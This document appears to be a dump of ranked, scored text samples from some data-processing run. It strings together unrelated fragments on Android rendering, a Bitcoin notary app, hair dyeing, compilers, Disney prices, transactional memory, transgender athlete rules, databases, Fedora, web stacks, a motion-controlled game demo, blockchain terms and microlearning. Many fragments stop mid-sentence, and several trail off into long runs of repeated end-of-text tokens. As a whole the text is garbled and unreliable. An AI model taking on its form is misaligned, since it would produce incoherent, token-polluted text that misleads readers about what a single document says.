curious-creature.org and graphics-geek.blogspot.com. — Tim Bray] - -Earlier this year, Android 3.0 launched with a new 2D rendering pipeline designed to support hardware acceleration on tablets. With this new pipeline, all drawing operations performed by the UI toolkit are carried out using the GPU. - -You’ll be happy to hear that Android 4.0, Ice Cream Sandwich, brings an improved version of the hardware-accelerated 2D rendering pipeline to phones, starting with Galaxy Nexus. - -Enabling hardware acceleration - -In Android 4.0 (API level 14), hardware acceleration, for the first time, is on by default for all applications. For applications at lower API levels, you can turn it on by adding android:hardwareAccelerated="true" to the tag in your AndroidManifest.xml. - -To learn more about the hardware accelerated 2D rendering pipeline visit the official Android developer guide. This guide explains how to control hardware acceleration at various levels, offers several performance tips and tricks and describes in details the new drawing model. - -I also encourage you to watch the Android Hardware Accelerated Rendering talk that we gave at Google I/O 2011. - -Introducing TextureView - -Applications that need to display OpenGL or video content rely today on a special type of UI element called SurfaceView. This widget works by creating a new window placed behind your application’s window. It then punches a hole through your application’s window to reveal the new window. While this approach is very efficient, since the content of the new window can be refreshed without redrawing the application’s window, it suffers from several important limitations. - -Because a SurfaceView’s content does not live in the application’s window, it cannot be transformed (moved, scaled, rotated) efficiently. This makes it difficult to use a SurfaceView inside a ListView or a ScrollView. SurfaceView also cannot interact properly with some features of the UI toolkit such as fading edges or View.setAlpha(). - -To solve these problems, Android 4.0 introduces a new widget called TextureView that relies on the hardware accelerated 2D rendering pipeline and SurfaceTexture. TextureView offers the same capabilities as SurfaceView but, unlike SurfaceView, behaves as a regular view. You can for instance use a TextureView to display an OpenGL scene or a video stream -================================================================================ -Rank = 27; Score = 5242880.0 -<|begin_of_text|>Bitcoin BlockNotary Used for Payment Processor Pay-Me - -BlockNotary is a new app that uses Tierion, and it is now used for one of Russia’s largest mobile payment processors. Pay-Me is a Russian mobile payments processor with over 30,000 installed devices, now backed by the power of the Bitcoin blockchain. - -In the past, new customers would have to register via interview that was conducted in person with a customer service rep, due to Russian criminals stealing credit cards and proceeding to use mobile PoS terminals to launder money. - -“Recording a video of yourself during the registration process helps prevent fraud. As CEO, I’d like to make it as difficult as possible for criminals to use Pay-Me to conduct illegal activities. – Pay-Me CEO, Vladimir Kanin.” - -Blocknotary has done away with this, replacing it with a video interview that can be conducted through a mobile application, where Tierion (through Blocknotarys app) collects the data to create verifiable record of the process which is then stored on the blockchain. This greatly accelerates the process, by making the whole verification steps much smoother, allowing the customer to have their PoS device shipped in a timelier manner. A video of the entire process (takes literally around a minute from start to finish) is seen on Tierions blog, linked here. - -Blocknotary’s Video Interview application lets customers verify their identity and conduct an interview from their location. The customer’s statement of intentions and the information needed for a background check are collected. This makes the onboarding process smoother for new customers and allows Pay-Me to ship a PoS device before a background check is complete. Additionally, Pay-me gets a tamperproof record of the entire process that can be verified using blockchain. This record can lower Pay-Me’s legal liability and be useful to police that are investigating fraudulent activity. - -Tierion is a “cloud platform backed by the power of the blockchain”, allowing users to easily collect and store data. Once data is acquired, it is then anchored to the blockchain to ensure authenticity, and the user is sent a blockchain receipt, allowing the user to verify the data without relying on a trusted third party. - -Will other financial institutions look to Bitcoin when it comes to screening new customers? What do you think? Let us know in the comments below!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 28; Score = 5210112.0 -<|begin_of_text|>If you’re thinking about getting pastel hair, you should consider the pros and cons first. Just kidding. Pastel hair is awesome! If you’re torn, do it! If you’re not sure if pastel hair would suit you, do it! You’ll be glad you did. If you want to know how to get pastel hair, keep reading! - -Below are all the products you’ll need. They’re clickable, so check them out. The white toner isn’t mandatory; you only absolutely need the bleaching kit, the conditioner, and your choice of hair dye. In addition to this, you’ll need some gloves, a shower cap, and a mixing bowl. The whole process should end up costing under 25$. - -[metaslider id=1039] - -Step 1: How To Bleach Your Hair - -The first step is bleaching your hair. If you have anything but light blonde hair, you absolutely need to bleach it if you want the pastel color to actually be pastel. If you have already blonde hair, skip this step. When choosing your bleaching product, it’s important to go for 30 volume. Anything under that is too weak for achieving pastel hair, and anything over that is too strong for safety — bleach can fry your hair, so be very careful! I recommend this nifty Manic Panic bleaching kit, which also contains gloves, a brush, and a mixing bowl. Tip: If you have very thick or long hair, you WILL need 2 boxes! It ends up going a bit over budget, but it’s well worth it! The first time I bleached my hair, I had to pause the job mid-bleaching and ask my friend to kindly go buy another box for me. Get two if you’re unsure! - -Make sure your hair hasn’t been washed for a few days before bleaching. Bleach is harsh on your scalp, and the oils will help protect it. - -If it’s your first time, have someone else help you and bleach your hair for you. Bleaching hair is tricky. Be safe! - -Follow the instructions on the packaging. A strand test is a very good idea! - -If your hair still isn’t light enough after bleaching, consider a white toner. If you want pastel blue hair, your hair has to be a very white blonde. Any yellow in your hair and the blue dye will turn green! - -Step 2: How to Get Pastel Hair - -There is no “pastel hair dye -================================================================================ -Rank = 29; Score = 4947968.0 -<|begin_of_text|>Completely Useless Fun Project: Parts Of The Compiler - -If you have done C/C++ or Objective-C work on MacOS (There is a project called GNUStep that allows you to run Obj-C on Linux), you may have heard of Clang and LLVM, or maybe Clang/LLVM. It may have confused you because there are two names for a seemingly single piece of software. It may confuse you further to point out that these are two different things, but two pieces to the same puzzle. - -What Clang and LLVM are, are the pieces of a compiler. A compiler is really just a single group of processes that takes in some source code and outputs some other code. This output code could be Assembly code, Java ByteCode, hell even Javascript. Like all good programming problems, compiler construction can be broken down into various parts. - -First, a history - -It may horrify you to know that computer programs weren’t always written in english. For many decades, Programs were written by hand in assembly language. It wasn’t until 1952 that totally bad ass Rear Admiral Grace Hopper built the first compiler and coined the term (she also coined the term debugging after pulling a literal moth out of her computer’s circuits). - -This first compiler wasn’t much of anything. It really just operated as more of a linker or a loader than what our modern compilers are. The first real modern compiler was introduced in 1957 by John W Backus and his team at IBM for Fortran. - -And compiler design hasn’t changed all that much since then. - -Design of the modern Compiler - -The Fortran compiler was built in an era where computers were insanely expensive, huge and slow. In order for Fortran to compete with hand coding assembly, it needed to be fast, at least as fast as hand written code. To do this, the compiler was broken down into two parts: the frontend and the backend (that is what Clang and LLVM are, the frontend and backend respectively). This made it easier to apply transformations and optimizations independently. - -The phases of the compiler - -At the highest level, the frontend takes the source code and outputs what is called an Intermediate Representation or IR. This may look like assembly code, all though it doesn’t have to, but it isn’t. This code is how compilers internally represent the source code. IRs are used so that that it can be optimized and translated much easier. They also must be designed in such away that the intent of the original source code is preserved and be independent of any source or target -================================================================================ -Rank = 30; Score = 4915200.0 -<|begin_of_text|>Image copyright Getty Images Image caption Disney's Magic Kingdom is the world's most visited theme park, with more than 17 million visitors in 2012. - -Disney has raised the price of a one-day ticket to its Magic Kingdom theme park in Orlando, Florida by $4 to $99 (£59.50). - -Magic Kingdom is the world's most visited theme park, with more than 17 million visitors in 2012. - -Ticket prices at other parks within Walt Disney World, including Epcot and Hollywood Studios, also jumped by $4. - -The hike comes after Disney reported surging revenues from its theme park businesses. - -In 2013, Disney made $671m from its theme parks - a 16% increase from the same period in 2012. - -Overall, its parks brought in $3.6bn in revenue in 2013, a 6% increase from 2012, according to the firm's most recent financial filings. - -The boost in revenue was "primarily due to increased guest spending at our domestic parks and resorts, which reflected higher average ticket prices and food, beverage and merchandise spending," according to Disney. - -Disney said that the majority of visitors to its parks buy tickets for multiple days. - -The company has theme parks throughout the world, with locations in Paris, Tokyo, and Hong Kong. - -According to a report from the Themed Entertainment Association and technology company AECOM, Disney's theme parks globally had more than 126 million visitors in 2012, the most recent year for which statistics are available.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 31; Score = 4849664.0 -<|begin_of_text|>Software Transactional Memory is a concept which offers many advantages when writing concurrent code. Most importantly, it removes the burden of writing correct multi-threaded code from the programmer, allowing her to focus more on the logic of the problem domain. STM will automatically take care of correctness. However, this comes with a cost – the bookkeeping. Tracking every access to a transactional field in order to properly detect and resolve conflicts introduces a cost penalty. But, at the same time, it also introduces the possibility to create and expose to the programmer some very interesting new semantics. - -Shielded has for some time already contained one such semantic addition – the Shield.Conditional static method. With it one may define a transaction which should run whenever a certain condition is satisfied by the current, committed “state of the world”. By virtue of its bookkeeping, Shielded can determine the exact fields your condition depends on. This way it easily knows, when another transaction commits into one of those fields, that your condition might have changed, and will re-evaluate it. (It will even track your condition for any changes in its access pattern between calls. This is important since, due to boolean expressions’ short-circuit evaluation, it is very easy for a condition to change its access pattern, and that must be taken into account.) - -This feature was inspired by the Haskell STM’s “retry” command, but it does not go as far as that. The Haskell “retry” can be called anywhere in a transaction, and it will block it until any of the fields, that it has accessed before calling retry, changes. Shielded does not do any such thing, it is a deliberate design decision to not include any threading or blocking constructs into the library. The idea is to allow Shielded to easily be combined with any such construct, depending on what the programmer wants to use, and not lock the programmer into a decision made by this library. And so, the Conditional does not even try executing straight away, but merely subscribes a transaction for future execution. - -The power of Haskell’s retry and orElse can be achieved by using Reactive Extensions. Combining Shielded with Rx.NET should not be a difficult task – create an IObservable by creating a Conditional which will call methods on an IObserver (tip – make such calls to IObserver as SideEffects of the Conditional transaction, otherwise you might be triggering observers repeatedly, and with non-committed data!). Once you have such an IObservable, the powerful Rx.NET library allows you to easily create very complex time-based logic, -================================================================================ -Rank = 32; Score = 4816896.0 -<|begin_of_text|>The issue is particularly nettlesome with individuals who have transitioned from male to female because of the belief that they might still have a physical advantage until their hormone therapy — which not every transgender person chooses to have — is complete. - -“When you start talking about transgender athletes, a male-to-female individual, we want to ensure that that is truly a decision that is permanent,” said Bobby Cox, the commissioner of the Indiana High School Athletic Association. “It is not a decision that, ‘I just decided today that I am going to be a girl and I am going to go play on a girls’ team’ and perhaps, disadvantage those kids that are on the team and imbalance the competition. - -“And as we progress down this path,’’ he added, “and as we spend more time and energy with advocacy groups and medical professionals in this area, I think that there will be additional amendments to our policies.” - -There is no reliable data on the number of transgender high school athletes. Only about 0.6 percent of the adult population identifies as transgender, according to federal data from 2016. Researchers from the Williams Institute, who conducted the study, reported that 0.56 percent of adults in Indiana reported identifying as transgender. - -In Texas, 0.66 percent of adults said they identify as transgender, the fifth-highest percentage in the country (behind Hawaii, California, New Mexico and Georgia). Still, transgender children are considered an at-risk minority outside of sports. According to The New England Journal of Medicine, the rate of suicide attempts among transgender people is 40 percent, compared to 4.6 percent among those who are not transgender. - -Relatively new policies are already being massaged and amended. In July, the Indiana state association voted unanimously to adjust its surgery requirement. It now no longer requires transgender students who are transitioning from female to male to have sex reassignment surgery in order to compete in the gender with which they identify. But that stipulation is still in place for someone transitioning from male to female. - -The group asserts it is acting in the name of fairness, but transgender rights activists accuse members of simply not wanting transgender people to participate, out of fear that those athletes will have an unfair advantage.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 33; Score = 4816896.0 -<|begin_of_text|>Throughout my software development career, I’ve seen my fair share of debates over how databases should be developed. And like most disagreements over technical pedantry, the participants are generally well-intentioned but grossly inexperienced. So much so that it wouldn’t matter if they use foreign keys or not. Though “elegant”, their software will become an unmaintainable mess after a few short years. But regardless, one counter-argument that constantly rears its ugly head goes something like, “but what if we have to change it later?” - -In other debates, that question can be quickly rebutted with “uh, we just change it then,” but when the discussion is on databases, it actually holds water. It’s as if the database is a marble statue that, once shipped to production, should never be changed... and if it must, there had better be a damn good reason. - -Let’s keep in mind that the whole point of developing software – that is, spending large sums of money paying developers’ salaries to build and maintain applications – is to have something that can change according to business need. When developers are unable, afraid, or unwilling to change the applications they develop, they make a very compelling case for being replaced by SAP. - -Databases are Different - -Databases are indeed different, especially when juxtaposed with what application developers are most familiar with: application code. - -Generally speaking, application code lives in a source control system and is a set of instructions that tell that tell the machine to do something. Whether it’s compiled or interpreted, or executed on a real or virtual machine, application code does stuff. - -As a developer, when you’re satisfied that it’s doing the right stuff, the release management process kicks in to promote that code through acceptance testing, quality testing, other testing, and finally production. And all along the way, the code should not change. If a bug is found, then it’s fixed in source control and sent right back through the same process. - -Databases, on the other hand, live on the production database server. There can certainly be other instances – development, testing, staging – but the only one that really matters is production. And these databases don’t actually do stuff, they’re merely modified and queried by other applications with a Structured Query Language. And unlike application code, databases (or at least, their completely integrated data) do change after deployment – that’s kind of their whole point. - -Database Changes Done Wrong - -Unlike application code, you can’t exactly drop a bunch of files in a -================================================================================ -Rank = 34; Score = 4784128.0 -<|begin_of_text|>There has been much talk about modularity recently. Fedora even has a working group on this topic. Modularity is such a generic term that it is a bit hard to figure out what this is all about, but the wiki page gives some hints: …base module… …docker image… …reduced dependencies… …tooling… - -A very high-level reading would be that this is about defining tools and processes to deliver software in modules, which can be larger units than packages, and e.g. come in the form of container images. - -Another reading would be that this is an effort to come to grips with the changing role of distributions in a world were containers are the dominant way to run and deploy applications. - -Modularity on the desktop - -In this post, I want to look at how this modularity effort looks from the desktop perspective, and what we are doing in this area. - -Our main goal for a while has been to make it easier to get desktop applications from application developers to users. - -In the traditional Linux distribution world, this is a total nightmare: Once you’ve written your application, you need to either learn how to create an Ubuntu.deb, an Arch.pkg, a Fedora.rpm, to name just a few, and then follow lengthy processes to get your packages accepted into these distributions. - -And once you’ve done all that, you will get bug reports that your application is broken with the one or other version of one of your dependencies. If not right away, then a few months down the road when the distributions move on to the latest and greatest releases. So, keeping those packages working requires the constant attention of a package maintainer. - -To improve on this sad state of affairs, we need to make applications much less dependent on the OS they run on, and on the libraries that happen to come with the OS. - -At this point, you might say: Aha, you want to bundle dependencies! Yes, but read on. Bundling is a bad word in the traditional distribution world. It implies duplication, since multiple applications may bundle the same library. And having multiple copies of the same library (possibly different versions, too), makes it harder to ensure that bug and security fixes get applied to all the copies. Not to mention that all the duplication consumes bandwidth when you have to download it all. - -Bundling everything with the application certainly has its drawbacks. But there are several things we can do to preserve most of the benefits of bundling, while avoiding the worst of the problems. - -One takeaway from the modularity discussions mentioned -================================================================================ -Rank = 35; Score = 4620288.0 -<|begin_of_text|>Pantheon, a WordPress and Drupal hosting service with a strong lineup of features for developers, today announced that it has raised a $29 million Series C round. Investors in this round include previous investors Foundry Group, OpenView Investment Partners, and Scale Venture Partners, as well as new investor Industry Ventures, which put $8.5 million into this round. - -This new round follows Pantheon’s $21.5 million Series B round in 2014 and brings the company’s total funding to $57 million. - -As Pantheon CEO and co-founder Zack Rosen told me, the company wants to help build the foundational technology for the web and eventually get to the point where it powers 30 percent of all sites. For now, though, he’s happy to simply make progress to getting to 1 percent, which he thinks the company will achieve in a few years. To help make that happen, the company plans to launch a migration toolkit next week that will allow website owners to more easily bring their existing site to the company’s platform. - -As Rosen told me, Pantheon now hosts 150,000 sites and while the company doesn’t release customer numbers, Rosen says that the company is seeing customer growth of over 100 percent year-over-year. To host all of this, Pantheon currently has 1.2 million containers in production. - -On group of users the company is especially focussing on its agencies. It now has partnered with 2,500 agencies and 50 resellers. - -As Rosen told me, the team decided to treat this round of funding like its last one. “We control our burn and are very deliberate in how we deploy our funding,” he added. It’s no secret that raising funding is getting harder and Rosen noted that VCs now want to see more numbers and ask tougher questions before they commit to a round. He does see a positive side of this, too, though. “It’s bad for the industry when VCs don’t ask the kind of questions they should be asking and companies that should be funded get funded — and then down the road they don’t have great results,” he said. “That makes it harder for everyone else.” - -The company wants to use this new round of funding to build out its product and make it easier for developers to build their sites on its platform. - -As part of today’s funding announcement, the company also announced that it has hired Niall Hayes, who previously led technology at KIXEYE and ran the CityVille studio at Zynga, as its VP -================================================================================ -Rank = 36; Score = 4587520.0 -<|begin_of_text|>January 2017 An updated post is available: Introducing the MEAN and MERN stacks. - -By Valeri Karpov, Kernel Tools engineer at MongoDB and and co-founder of the Ascot Project. - -A few weeks ago, a friend of mine asked me for help with PostgreSQL. As someone who’s been blissfully SQL-­free for a year, I was quite curious to find out why he wasn’t just using MongoDB instead. It turns out that he thinks MongoDB is too difficult to use for a quick weekend hack, and this couldn’t be farther from the truth. I just finished my second 24 hour hackathon using Mongo and NodeJS (the FinTech Hackathon co­sponsored by 10gen) and can confidently say that there is no reason to use anything else for your next hackathon or REST API hack. - -First of all, there are huge advantages to using a uniform language throughout your stack. My team uses a set of tools that we affectionately call the MEAN stack:­ MongoDB, ExpressJS, AngularJS, and Node.js. By coding with Javascript throughout, we are able to realize performance gains in both the software itself and in the productivity of our developers. With MongoDB, we can store our documents in a JSON-­like format, write JSON queries on our ExpressJS and NodeJS based server, and seamlessly pass JSON documents to our AngularJS frontend. Debugging and database administration become a lot easier when the objects stored in your database are essentially identical to the objects your client Javascript sees. Even better, somebody working on the client side can easily understand the server side code and database queries; using the same syntax and objects the whole way through frees you from having to consider multiple sets of language best practices and reduces the barrier to entry for understanding your codebase. This is especially important in a hackathon setting: the team may not have much experience working together, and with such little time to integrate all the pieces of your project, anything that makes the development process easier is gold. - -Another big reason to go with MongoDB is that you can use it in the same way you would a MySQL database (at least at a high level). My team likes to describe MongoDB as a “gateway drug” for NoSQL databases because it is so easy to make the transition from SQL to MongoDB. I wish someone had told me this when I first starting looking into NoSQL databases, because it would have saved me a lot of headaches. Like many people, I was under the impression that CouchDB would be easier to -================================================================================ -Rank = 37; Score = 4554752.0 -<|begin_of_text|>Space Invaders - -//Detect if the browser supports DeviceMotionEvent if (window.DeviceMotionEvent!= undefined) { //ondevicemotion is fired when iOS device detects motion window.ondevicemotion = function(e) { //ax is the movement on the x axis. //This motion is used to move the ship in the game ax = event.accelerationIncludingGravity.x * 5; ay = event.accelerationIncludingGravity.y * 5; //Status 0 is start, 1 is left, 2 is right, 3 is stay if(status == 0){ //initial condition status = 3; //stay socket.emit('spaceChange', {'ax': 3}); statusmsg = 'Waiting for movement'; } if(ax > 14 && status!= 2){ //move right on device status = 2; socket.emit('spaceChange', {'ax': 2}); statusmsg = 'Moving ship right'; } if(ax < -14 && status!= 1){ //move left on device status = 1; socket.emit('spaceChange', {'ax': 1}); statusmsg = 'Moving ship left'; } if(ax > -14 && ax < 14 && status!= 3){ //device held steady status = 3; socket.emit('spaceChange', {'ax': 3}); statusmsg = 'Ship held steady'; } - -Current space invaders game uses only X axis movement on the iOS device. However, all three dimension values are available on iOS Safari ondevicemotion method. It is technically possible to do much more with the iOS device. - --- webdigi - -The guys over at WebDigi, a London-based web application development company, has released a demo ofSpaceship Pilot, a pretty amazing application that uses iOS devices as the controller for a web browser-based game on your desktop or laptop. No application is required on the iOS device, you simply scan the QR code with the device and the controller code reads the accelerometer values and sends the movements to the node.js server.Here are the key parts of the iOS device controller code:Only changes in direction on the iOS device are pushed to the node.js server, reducing the amount of data pushed between phone and server. The node.js server is coupled with Socket.IO, making it easier to deliver data in realtime using most web browsers. Since Socket.IO code is run on both the server and client sides, pairing it with node.js allows accelerometer values to be pushed instantly from mobile safari to your browser.After testing (read: playing -================================================================================ -Rank = 38; Score = 4521984.0 -<|begin_of_text|>Double-Spend Protection: - -Double-spend protection is the main reason blockchains exist in the first place. In technical terms this means that two valid transactions which spend the same transaction output (UTXO) will conflict and only one can be confirmed in the network. Account based languages (for example Ethereum) that allow for spending the same amount from the same address multiple times, usually have other means to prevent double spending. - -Multisig: - -Multisig is a very old concept and can be compared to a shared checkbook with multiple required signers. A multisig transaction allows to enforce arbitrary joint signature rules. COMIT uses 2 out of 2 multisig transactions for which both signers have to sign a transaction to become valid and accepted by the network. Multi-signature transactions are a requirement for Payment Channels. - -Time-Locks: - -A timelock is a simple requirement for funds to be locked up until a future date. Blockchains are found to have 2 different kind of time-locks: relative and absolute time-locks. Absolute time-locks will lock a transaction output until a fixed time in the future. Relative time-locks will lock a transaction output relative to the time the transaction was confirmed. Time-locks are a requirement for trustless Payment Channels and relative time-locks are recommended as they allow for indefinitely open Payment Channels. - -Hash function: - -To be able to route across multiple blockchains, we need the same hash function to be able available in the smart contracting language of each blockchain. A standard hash function like the SHA256 hash function is usually available and is perfectly suitable for this purpose.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 39; Score = 4489216.0 -<|begin_of_text|>In the world of elearning, microlearning has become a buzzword. It’s considered a powerful new approach to training the workforce. With the average attention span in North America dropping from 12 seconds in 2000 to 8 seconds in 2015, the demand for shorter, more engaging training is higher than ever! - -In this post, our goal is to cover the basics and leave you with an understanding of: What Microlearning is and the benefits it can provide. Throughout this post, we’ll try to give you examples of how to use microlearning in your own training programs. - -What is Microlearning? - -Microlearning is focused learning that is delivered in bite sized chunks. Since this method of learning provides small bits of knowledge at a time, it’s best used for delivering information that learners need to retain. - -Microlearning can be achieved using a number of different delivery methods: emails, online posts and short multimedia videos, are all examples of different ways you can deliver training that is designed for your learners to retain new knowledge and achieve their educational goals. - -Examples of Microlearning: - -– Watching video tutorials on Youtube - -– Receiving small bits of education via email: like Word of the Day from Dictionary.com - -– Online learning programs like Duolingo or Lynda - -What are the benefits that Microlearning can provide? - -1. Avoid the risk of overwhelming learners - -Microlearning allows learners to move at their own pace, giving them the ability to go back and review complex concepts as often as needed. Since new knowledge is delivered in smaller chunks, learners avoid the risk of being overwhelmed by too much information at once. - -2. Create on-the-go training that can be accessed anywhere, at anytime. - -Microlearning can be achieved using a number of different delivery methods. Email, online posts, videos, even tweets because of this training can usually be accessed across multiple devices, making it available on-the-go. Learners can access and review training materials while doing everyday tasks like: waiting for the bus, sitting on the train, or even riding the elevator! - -3. Help learners better retain new knowledge - -Traditional classroom training often provides little to no long term takeaways for learners. The Wall Street Journal recently reported that 90 percent of new skills are lost within a year of training! Microlearning breaks new knowledge down into short chunks making learning easier to digest, understand, and apply on the job. - -Different ways to use Microlearning: - -– Health and Safety training - -– Learning new software - -– Business Processes and Procedures - -Microlearning yields many benefits for organizations looking -================================================================================ -Rank = 40; Score = 4456448.0 -<|begin_of_text|>Tomorrow (November 7th) we’ll be hosting a testday for the Server Product. Members of the Server Working Group as well as QA will be available on freenode in the #fedora-test-day channel to help out with testing. The focus of the testday will be on several facets of the server product: - -At this point you might be asking, “What do each of those things do and how would I benefit from testing them?” I’ll try to give a quick explanation of what each of those features are and why they’re important to the Server Product. - -FreeIPA - -FreeIPA provides your Linux network with its own Domain Controller capable of managing users, groups, DNS, certificates and single-sign-on capabilities. Taken from the FreeIPA website: - -FreeIPA is an integrated Identity and Authentication solution for Linux/UNIX networked environments. A FreeIPA server provides centralized authentication, authorization and account information by storing data about user, groups, hosts and other objects necessary to manage 